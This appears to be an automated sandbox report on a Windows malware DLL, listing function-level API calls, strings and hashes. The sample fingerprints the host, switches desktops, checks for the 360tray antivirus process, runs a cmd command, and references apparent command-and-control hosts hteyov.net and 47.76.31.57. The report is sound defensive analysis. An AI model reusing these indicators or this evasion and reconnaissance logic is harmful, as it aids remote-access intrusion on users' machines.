getsockname.WS2_32(?,?,00000010), ref: 1000C5C9

Part of subcall function 1000BE32: lstrlenA.KERNEL32(00000032,?,?,?,?,?,?,?,?,?,00000032,?), ref: 1000BE6F
Part of subcall function 1000BE32: gethostname.WS2_32(00000032,?), ref: 1000BE81

GetVersionExA.KERNEL32(0000009C), ref: 1000C610

Part of subcall function 1000C4A8: LoadLibraryA.KERNEL32(ntdll.dll,?), ref: 1000C4C1
Part of subcall function 1000C4A8: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1000C4D9
Part of subcall function 1000C4A8: FreeLibrary.KERNEL32(00000000), ref: 1000C512

Part of subcall function 1000BFAC: GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,1000C638), ref: 1000BFBC
Part of subcall function 1000BFAC: GetProcAddress.KERNEL32(00000000), ref: 1000BFC3
Part of subcall function 1000BFAC: GetCurrentProcess.KERNEL32(00000000), ref: 1000BFDD

Part of subcall function 1000BDD2: GetSystemInfo.KERNEL32(?), ref: 1000BE0E
Part of subcall function 1000BDD2: wsprintfA.USER32 ref: 1000BE25

Part of subcall function 1000C1C1: FindWindowA.USER32(?,00000000), ref: 1000C228
Part of subcall function 1000C1C1: GetWindowTextA.USER32(00000000,?,00000104), ref: 1000C267
Part of subcall function 1000C1C1: GetWindow.USER32(00000000,00000002), ref: 1000C2F1
Part of subcall function 1000C1C1: GetClassNameA.USER32(00000000,?,00000104), ref: 1000C30A
Part of subcall function 1000C1C1: CloseHandle.KERNEL32(00000000), ref: 1000C319

lstrcpyA.KERNEL32(?,00000000), ref: 1000C660

Part of subcall function 1000C3E9: lstrcatA.KERNEL32(100548C8,00000000), ref: 1000C454
Part of subcall function 1000C3E9: lstrcatA.KERNEL32(100548C8,1004FB14), ref: 1000C464
Part of subcall function 1000C3E9: lstrcatA.KERNEL32(100548C8,1004FB1C), ref: 1000C499

GetLastInputInfo.USER32(00000008), ref: 1000C696
GetTickCount.KERNEL32 ref: 1000C69C
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 1000C6CA
__aulldiv.LIBCMT ref: 1000C6E5
__aulldiv.LIBCMT ref: 1000C6F3

Strings

SOFTWARE\%s, xrefs: 1000C53B
@, xrefs: 1000C6B9
RDP-Tcp, xrefs: 1000C744
Sauron, xrefs: 1000C536
31.57, xrefs: 1000C724
Groupfenzhu, xrefs: 1000C57E

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$Windowlstrcat$FreeHandleInfoLoad__aulldivlstrlenwsprintf$ClassCloseCountCurrentFindGlobalInputLastMemoryModuleNameOpenProcessStatusSystemTextTickVersiongethostnamegetsocknamelstrcpy
String ID: 31.57$@$Groupfenzhu$RDP-Tcp$SOFTWARE\%s$Sauron
API String ID: 2572476270-1442175657
Opcode ID: 4b0a648d6ff62319d9e0a845d19fed7efa54bdf9090debde0f82da93711c8d08
Instruction ID: ce042f1f5155fc1445de27eb437dad0ced23f2b52e03b682e3f5cccea503d363
Opcode Fuzzy Hash: 4b0a648d6ff62319d9e0a845d19fed7efa54bdf9090debde0f82da93711c8d08
Instruction Fuzzy Hash: 6C5150B5840218ABEB24DBA0CC86FD97778EB58700F0046D4F70DA6181EB75AB88CF95

Function 1000BC46 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 134
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Ole32.dll,?,?,?,?,?,?,?,?,1000C71E,00000000,?,00000400,00000000,?,?), ref: 1000BC51
GetProcAddress.KERNEL32(?,CoInitialize), ref: 1000BC63
GetProcAddress.KERNEL32(?,CoUninitialize), ref: 1000BC75
GetProcAddress.KERNEL32(?,CoCreateInstance), ref: 1000BC87
LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,1000C71E,00000000,?,00000400,00000000,?,?), ref: 1000BC95
GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 1000BCA7

Strings

Ole32.dll, xrefs: 1000BC4C
FriendlyName, xrefs: 1000BD61
CoCreateInstance, xrefs: 1000BC7E
Oleaut32.dll, xrefs: 1000BC90
CoUninitialize, xrefs: 1000BC6C
SysFreeString, xrefs: 1000BC9E
CoInitialize, xrefs: 1000BC5A

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
API String ID: 2238633743-3340630095
Opcode ID: 46e5b546691333f6ff37089c51b7f49bf05841b5f96da0e6eb909ee8a0da89b7
Instruction ID: e0a0fbe831552c0ce7c4a40bf3a22c7bf9c015ff1ea365cac51c21dee81acc34
Opcode Fuzzy Hash: 46e5b546691333f6ff37089c51b7f49bf05841b5f96da0e6eb909ee8a0da89b7
Instruction Fuzzy Hash: A751B078D01219EFEB00DFA0C888BEEB7B5FF48305F208559FA02A7254D775A945CB64

Function 10010913 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(user32.dll,?,?,?,00000000,Function_00013050,10027540,000000FF,?,10010B4B,00000000), ref: 1001093E
GetProcAddress.KERNEL32(?,GetThreadDesktop), ref: 10010950
GetProcAddress.KERNEL32(?,GetUserObjectInformationA), ref: 10010962
GetProcAddress.KERNEL32(?,SetThreadDesktop), ref: 10010974
GetProcAddress.KERNEL32(?,CloseDesktop), ref: 10010989
LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,00000000,Function_00013050,10027540,000000FF,?,10010B4B,00000000), ref: 10010997
GetProcAddress.KERNEL32(?,GetCurrentThreadId), ref: 100109A9
GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 100109E0

Strings

user32.dll, xrefs: 10010939
kernel32.dll, xrefs: 10010992
GetUserObjectInformationA, xrefs: 10010959
GetCurrentThreadId, xrefs: 100109A0
GetThreadDesktop, xrefs: 10010947
SetThreadDesktop, xrefs: 1001096B
CloseDesktop, xrefs: 10010980

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$InformationObjectUser
String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
API String ID: 465279233-588083535
Opcode ID: a338793a1ff362fac19a7f7375830bf17ee60e32d8ca158fbc88d8efc21193ca
Instruction ID: afda10ef0dbe049223bd20022b83141d2d5b01616cdacadb9d77809edb1ac447
Opcode Fuzzy Hash: a338793a1ff362fac19a7f7375830bf17ee60e32d8ca158fbc88d8efc21193ca
Instruction Fuzzy Hash: 2631E3B5D01218EFDB10DFA4CC88BEEBBB8FB48320F108219FA15A6250D7759985CF65

Function 00410F95 Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 367
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(log.src,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00411015
malloc.MSVCRT(?), ref: 0041109B
ReadFile.KERNEL32(?,?,?,00000000,00000000), ref: 004110C6

Strings

RtlFreeUnicodeString, xrefs: 0041155F, 00411562
CLRCreateInstance, xrefs: 004115CF, 004115D2
RtlInitAnsiString, xrefs: 00411411, 00411414
log.src, xrefs: 00411011, 00411014
ntdll.dll, xrefs: 004112B4, 004112B7
RtlAnsiStringToUnicodeString, xrefs: 004114F2, 004114F8
LdrLoadDll, xrefs: 004113B3, 004113B6
LdrGetProcedureAddress, xrefs: 004112AD, 004112B3
NtAllocateVirtualMemory, xrefs: 0041136E, 00411374
malloc, xrefs: 00411081, 00411084
msvcrt.dll, xrefs: 00411085, 00411088

Memory Dump Source

Source File: 00000007.00000002.3502521914.0000000000410000.00000040.00001000.00020000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_lXAMaI.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: CLRCreateInstance$LdrGetProcedureAddress$LdrLoadDll$NtAllocateVirtualMemory$RtlAnsiStringToUnicodeString$RtlFreeUnicodeString$RtlInitAnsiString$log.src$malloc$msvcrt.dll$ntdll.dll
API String ID: 3950102678-98379912
Opcode ID: 0b722f6a919f890057c0ba74153cb2c2f22d33689224466a39074f5a797fa911
Instruction ID: ed5ace249f17b7bc1dfb3058b69809d463c3d867711608228cfa4d567dd95f84
Opcode Fuzzy Hash: 0b722f6a919f890057c0ba74153cb2c2f22d33689224466a39074f5a797fa911
Instruction Fuzzy Hash: 99229060D083D8DDEB21C7A8C8497DDBFB55B16708F0841D9D18C7B282D7BA1A98CB76

Function 1000814B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001490: WSAStartup.WS2_32(00000202,?), ref: 10001513
Part of subcall function 10001490: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10001521

_rand.LIBCMT ref: 100081E4
Sleep.KERNEL32(00000BB8), ref: 100081F4
GetTickCount.KERNEL32 ref: 10008231
GetTickCount.KERNEL32 ref: 10008265
WaitForSingleObject.KERNEL32(?,00000064,?,?,0000238A,00000001), ref: 10008303
Sleep.KERNEL32(000001F4,?,?,0000238A,00000001), ref: 10008314

Part of subcall function 100020C1: TerminateThread.KERNEL32(00000001,000000FF,?,?,?,?,?,?,?,?,?,000000FF), ref: 1000211C
Part of subcall function 100020C1: CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,000000FF), ref: 1000212D

Strings

hteyov.net, xrefs: 1000818E
47.76.31.57, xrefs: 10008280

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CountSleepTick$CloseCreateEventHandleObjectSingleStartupTerminateThreadWait_rand
String ID: 47.76.31.57$hteyov.net
API String ID: 1737085377-2783612446
Opcode ID: e342bdb3454f8f1e6482e60d9f2ca1461fed5bc826ee22632476eb8b85f2119d
Instruction ID: 5ae72634a90c4d98f96e2826eba74628bce2307f27b56a6d1273515c8ee1ac15
Opcode Fuzzy Hash: e342bdb3454f8f1e6482e60d9f2ca1461fed5bc826ee22632476eb8b85f2119d
Instruction Fuzzy Hash: B5518574804358DAFB14CB64CD95BEEB7B4FB08380F1041A9E909AB295EB756F84CF51

Function 1000C1C1 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowA.USER32(?,00000000), ref: 1000C228
GetWindowTextA.USER32(00000000,?,00000104), ref: 1000C267
GetWindow.USER32(00000000,00000002), ref: 1000C2F1
GetClassNameA.USER32(00000000,?,00000104), ref: 1000C30A
CloseHandle.KERNEL32(00000000), ref: 1000C319

Strings

CTXOPConntion_Class, xrefs: 1000C1EA
NULL, xrefs: 1000C34A
CTXOPConntion_Class, xrefs: 1000C23B

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Window$ClassCloseFindHandleNameText
String ID: CTXOPConntion_Class$CTXOPConntion_Class$NULL
API String ID: 1576580817-3670953402
Opcode ID: 4e9d15fe3802210cc5809079a7dd0da0c98961ae7c478857b9a1c839b5f0dcba
Instruction ID: 36d0a727335f631d8d4addbf8e0ff254d5614ebf325fec96112c3f8b0572690d
Opcode Fuzzy Hash: 4e9d15fe3802210cc5809079a7dd0da0c98961ae7c478857b9a1c839b5f0dcba
Instruction Fuzzy Hash: BB4192B6D0021CABDB15DBA4CC44BDEB7B8EB48300F1045E9E609A7141EB75AB94CF91

Function 10010A51 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 10010A79
GetProcAddress.KERNEL32(?,OpenInputDesktop), ref: 10010ACE
GetProcAddress.KERNEL32(?,OpenDesktopA), ref: 10010AE0
GetProcAddress.KERNEL32(?,CloseDesktop), ref: 10010AF2

Part of subcall function 10010913: LoadLibraryA.KERNEL32(user32.dll,?,?,?,00000000,Function_00013050,10027540,000000FF,?,10010B4B,00000000), ref: 1001093E
Part of subcall function 10010913: GetProcAddress.KERNEL32(?,GetThreadDesktop), ref: 10010950
Part of subcall function 10010913: GetProcAddress.KERNEL32(?,GetUserObjectInformationA), ref: 10010962
Part of subcall function 10010913: GetProcAddress.KERNEL32(?,SetThreadDesktop), ref: 10010974
Part of subcall function 10010913: GetProcAddress.KERNEL32(?,CloseDesktop), ref: 10010989
Part of subcall function 10010913: LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,00000000,Function_00013050,10027540,000000FF,?,10010B4B,00000000), ref: 10010997
Part of subcall function 10010913: GetProcAddress.KERNEL32(?,GetCurrentThreadId), ref: 100109A9
Part of subcall function 10010913: GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 100109E0

Strings

OpenDesktopA, xrefs: 10010AD7
user32.dll, xrefs: 10010A74
CloseDesktop, xrefs: 10010AE9
OpenInputDesktop, xrefs: 10010AC6, 10010AC9

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$InformationObjectUser
String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
API String ID: 465279233-3711086354
Opcode ID: 6b26e8386b2229d1dac8b248bcdd03783f966806100e8b8c447dac43bffa529b
Instruction ID: c06518f5a3c27d806500addcccacb927621a5c665d1fdaf834b4b3e725836ffb
Opcode Fuzzy Hash: 6b26e8386b2229d1dac8b248bcdd03783f966806100e8b8c447dac43bffa529b
Instruction Fuzzy Hash: 1C415E70D08288EEEB11CBA8DC88BCEBFB4EF09718F144159F5487A281C7BA5945CB75

Function 100084E6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 48synchronizationsleepCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,?,1000B805), ref: 100084F5
GetLastError.KERNEL32(?,1000B805), ref: 100084FE
CloseHandle.KERNEL32(?,?,1000B805), ref: 1000850F
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,1000B805), ref: 10008537
WaitForSingleObject.KERNEL32(1000B805,000000FF), ref: 1000855F
CloseHandle.KERNEL32(1000B805), ref: 10008569

Strings

LJPXYXC, xrefs: 100084EC

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutexObjectSingleSleepWait
String ID: LJPXYXC
API String ID: 3934243189-2020922294
Opcode ID: 11d6c2d19545895ea2228b74b4ace74333f0bd89352b454f91efcf7dd78411df
Instruction ID: 7b2c8789f30e2cf31715708ea5f1891f08b4dbee314c72dc190a0aa6eb42858f
Opcode Fuzzy Hash: 11d6c2d19545895ea2228b74b4ace74333f0bd89352b454f91efcf7dd78411df
Instruction Fuzzy Hash: 4A01FF74B84304F7F720ABA48D4BF5D7A64EB14B02F300554FB09BA2D5D6B4B6414769

Function 10001652 Relevance: 10.6, APIs: 7, Instructions: 100networkCOMMON

Download Yara Rule

APIs

Part of subcall function 10001C6F: setsockopt.WS2_32(?,0000FFFF,00000080,00000001,00000004), ref: 10001C9B
Part of subcall function 10001C6F: CancelIo.KERNEL32(?), ref: 10001CA8
Part of subcall function 10001C6F: InterlockedExchange.KERNEL32(?,00000000), ref: 10001CB7
Part of subcall function 10001C6F: closesocket.WS2_32(?), ref: 10001CC4
Part of subcall function 10001C6F: SetEvent.KERNEL32(?), ref: 10001CD1

ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,10008250,?,?), ref: 1000166A
socket.WS2_32(00000002,00000001,00000006), ref: 1000167D
gethostbyname.WS2_32(?), ref: 100016A4

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Event$CancelExchangeInterlockedResetclosesocketgethostbynamesetsockoptsocket
String ID:
API String ID: 513860241-0
Opcode ID: ad0eae9492ef6116e0eca8b23ebdc7968ae5a59a65905d9dbedf1d2a7f111a95
Instruction ID: cf1fe356c6dbc40198a31201e27bcb0af4bc2cb1e641d9f2a17be883b86685fa
Opcode Fuzzy Hash: ad0eae9492ef6116e0eca8b23ebdc7968ae5a59a65905d9dbedf1d2a7f111a95
Instruction Fuzzy Hash: 90412F74E40209AFEB10DFA4C885BEEB7B5FF48704F208149EA156B2C1D7B5A945DFA0

Function 1000AEDB Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 33sleepprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 10008E2E: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10008E45
Part of subcall function 10008E2E: Process32First.KERNEL32(?,00000128), ref: 10008E62

Sleep.KERNEL32(000001F4), ref: 1000AF35

Part of subcall function 100122A7: GetFileAttributesA.KERNEL32(00000000,1000B307,c:\xxxx.ini,00000000), ref: 100122AB
Part of subcall function 100122A7: GetLastError.KERNEL32 ref: 100122B6

WinExec.KERNEL32(cmd /c echo.>c:\xxxx.ini,00000000), ref: 1000AF2A

Strings

360tray.exe, xrefs: 1000AEFA
c:\xxxx.ini, xrefs: 1000AF0F
360Tray.exe, xrefs: 1000AEE7
cmd /c echo.>c:\xxxx.ini, xrefs: 1000AF25

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorExecFileFirstLastProcess32SleepSnapshotToolhelp32
String ID: 360Tray.exe$360tray.exe$c:\xxxx.ini$cmd /c echo.>c:\xxxx.ini
API String ID: 501125565-2107407709
Opcode ID: 6e0368872155626bfed23c531cf35852e848d01faf544785351d2372f5e95fdf
Instruction ID: 87e90a18934a94d3d61b99558977ef509b4628e1c808423990042ee8b83e206b
Opcode Fuzzy Hash: 6e0368872155626bfed23c531cf35852e848d01faf544785351d2372f5e95fdf
Instruction Fuzzy Hash: 79F0E5F696821362FA10C6E05C0AB3E3084DB121D0F310332FE0AC40DAEA10F6D1402F

Function 1000BDD2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 10011039: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100110B4
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 100110CC
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100110E1
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100110F6
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1001110B
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 10011120
Part of subcall function 10011039: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 10011149
Part of subcall function 10011039: FreeLibrary.KERNEL32(00000000), ref: 10011354

GetSystemInfo.KERNEL32(?), ref: 1000BE0E
wsprintfA.USER32 ref: 1000BE25

Strings

~MHz, xrefs: 1000BDF3
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 1000BDF8
%d*%sMHz, xrefs: 1000BE1C

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeInfoLoadOpenSystemwsprintf
String ID: %d*%sMHz$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
API String ID: 2019226949-2169120903
Opcode ID: 7e0b2659a92464e724e08fceb9bac7aafc14ad3921dc6c497744cbc3a64e8b80
Instruction ID: 7d71b5db95bfd63500995623d926b61552ed65feaeb1ff0373c4be85b7a17023
Opcode Fuzzy Hash: 7e0b2659a92464e724e08fceb9bac7aafc14ad3921dc6c497744cbc3a64e8b80
Instruction Fuzzy Hash: D4F03071950218BFE700DBE4DC4AFFDB778EB48604F14455DFB08B6281EA70651487AA

Function 1000AF53 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 1000AF7F
OutputDebugStringA.KERNELBASE(Thread running...), ref: 1000AF8A
OutputDebugStringA.KERNEL32(Thread Exit...), ref: 1000AF97

Strings

Thread running..., xrefs: 1000AF85
Thread Exit..., xrefs: 1000AF92

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: DebugOutputString$Sleep
String ID: Thread Exit...$Thread running...
API String ID: 3789842296-10974087
Opcode ID: 6dc29a1258e83b6cad0b4cdc4689a1c76903960f3a2e212c06dc78e99c2c3e97
Instruction ID: 94288e925ba09ce8c2f71c0a8f5251ab8268725e375c4301205dbe3b33efe07d
Opcode Fuzzy Hash: 6dc29a1258e83b6cad0b4cdc4689a1c76903960f3a2e212c06dc78e99c2c3e97
Instruction Fuzzy Hash: 91F0A77080A244EFE701DBB48D086AC7770EF06341B2582A5F519C6053C73049499721

Function 10007ABB Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 72stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 10007B81
